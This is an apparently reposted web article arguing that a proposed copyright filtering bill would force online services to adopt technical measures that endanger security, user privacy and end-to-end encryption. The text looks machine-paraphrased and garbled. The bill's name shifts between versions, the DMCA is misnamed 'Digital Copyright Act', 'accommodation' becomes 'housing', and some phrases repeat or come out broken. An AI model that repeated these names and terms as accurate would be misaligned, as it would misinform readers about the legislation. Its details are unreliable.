The Filtering Powers Bill is a privacy and security mess | Media Pyro

[ad_1]

Among many other issues, the Technology Copyright Enhancement Act will require a number of filtering technologies that online service providers must “accommodate.” And that mandate is broad, so ill-conceived, and so technically flawed that it will inevitably create serious privacy and security risks.

Since 1998, the Digital Copyright Act (DMCA) has required services to take “standard technical measures” to reduce infringement. The Digital Copyright Act’s (DMCA) definition of Standard Technical Measures (STMs) requires that they be developed based on broad consensus in an open, fair, cross-industry and, perhaps most importantly, voluntary process. In other words, current legislation reflects the understanding that most technologies should not be accepted as standards because standards affect many, many stakeholders, all of whom deserve a say.

But the filtering powers bill is clearly designed to undermine the well-balanced provisions of the DMCA. It changes the definition of standard technical measures to also include technologies supported by only a small number of rights holders and technology companies.

It also adds a new category of filters called “designated technical measures” (DTMs), which must be “tailored” to online services. “Adaptation” is broadly defined as “adaptation, implementation, integration, adjustment and conformity” to a specified technical measure. Failure to do so could mean losing the safe harbor of the Digital Millennium Copyright Act (DMCA) and thus risking devastating liability for the actions of your users.

The Copyright Office will be responsible for determining these measures. Anyone can petition for such a designation, including companies that produce these technologies and want to guarantee a market for them.

The large number of potential petitions will put a lot of pressure on the Copyright Office, which exists to register copyrights, not to evaluate technology. This will put even more pressure on the people who have Internet users’ rights at heart—independent creators, technologists, and civil society—to oppose the petitions and provide evidence of the dangers they pose. These dangers are all too likely given the amount of technology the new rules will require services to “accommodate.”

Demanding this “housing” would jeopardize security

Filter powers allow the Copyright Office to provide mandatory “accommodation” for both specific technologies and general categories of technologies. This raises a number of security issues.

There’s a reason that standardization is a long and time-consuming process, and it’s about finding all the potential problems before demanding it across the board. Requiring unproven, unproven technologies to be widely distributed would be a security disaster.

Consider a piece of software designed to scan downloaded content for copyrighted works. Even leaving aside the question of fair use, the text of the bill does not impose a limit on the developer’s knowledge of security. In large companies, third-party software is usually thoroughly vetted by an internal security group before being integrated into the software stack. A law, especially one that requires only minimal Copyright Office approval, should not be able to bypass these checks, and certainly should not require companies that do not have the resources to do so themselves. Poorly implemented software leaves potential security vulnerabilities that can be used by malicious hackers to steal personal information of service users.

Security is quite complex. Errors that lead to database hacking happens all the time even when teams do their best to be safe; who doesn’t currently have a free credit report violation? With this bill, what incentive does a content matching technology company have to invest time and money in creating secure software? The Copyright Office is not going to check for buffer overflows. And what happens when a critical vulnerability is discovered after the software has been approved and widely adopted? Companies will have to choose between opting out of DMCA protection and going out of business by shutting it down, or letting their users suffer through the bug. In such a scenario, no one wins, and the users lose the most.

“Accommodation” will also compromise privacy

Similar concerns arise with respect to privacy. It’s bad enough that potential bugs could be used to leak user data, but this bill also leaves the door open to direct collection of user data. This is because the DTM may include an application that detects a potential breach by collecting personal data while using the service and then sends that data directly to an external party for verification. The scale of such data collection would blow away the Cambridge Analytica scandal, as it would be required for all services, for all their users. It’s easy to imagine how such a feature would be a dream for law enforcement — a direct way to track and contact offenders, without any action from the service provider — and a nightmare for users’ privacy.

Even a technology that only collects information when it detects the use of copyrighted media on a service would be disastrous for privacy. The bill does not place restrictions on content sharing channels that fall under these provisions. Content for public viewing is one thing, but providers may be forced to apply scanning technology to all content that crosses the platform, even if it’s only sent in private messages. Worse, the bill could be used to require platforms to scan the content of encrypted messages between users, which is fundamentally break the promise of end-to-end encryption. If someone sends a message to a friend, but the scanning software links them to a service or even directly to a media company, it’s simple not end-to-end encryption. Even in the best case scenario, assuming the software works perfectly as intended, it’s impossible to require it for all service actions and allow end-to-end encryption. If information about the contents of a message can be leaked, the message cannot be considered encrypted. In practice, this will happen regularly, even with fair use content, because a person will likely need to view it.

TThe Copyright Office is supposed to “consider” the impact of technology on data privacy and security, but it should not prioritize it over the myriad factors it must also “consider.” In addition, assessing privacy and security requires a level of technological expertise that is beyond the office’s current purview. If a company claims that its technology is safe, and there is no independent technologist to dispute it, the Copyright Office may simply accept the claim. The company is interested in defining “secure” and “private” in a way that it can claim that their product complies; a user or a security professional may define it quite differently. Companies are not interested in this either exactly how their technology does what it claims to do, making it difficult to assess the security and privacy concerns it might cause. Again, the burden falls on outside experts to monitor the Copyright Office’s processes and provide information on behalf of the millions of people who use the Internet.

This bill is a disaster. Ultimately, this would require any online service to risk hundreds of thousands of dollars in debt to the underlying rights holders, risking the privacy and security of its users. We all have a right to free expression, and we shouldn’t sacrifice privacy and security when we rely on the platform to exercise this right online.

[ad_2]

Source link

Avatar photo

About the author

Media Pyro is a site giving interesting facts about acer brand products. We also Provide information about your online Privacy Laws.

This will close in 10 seconds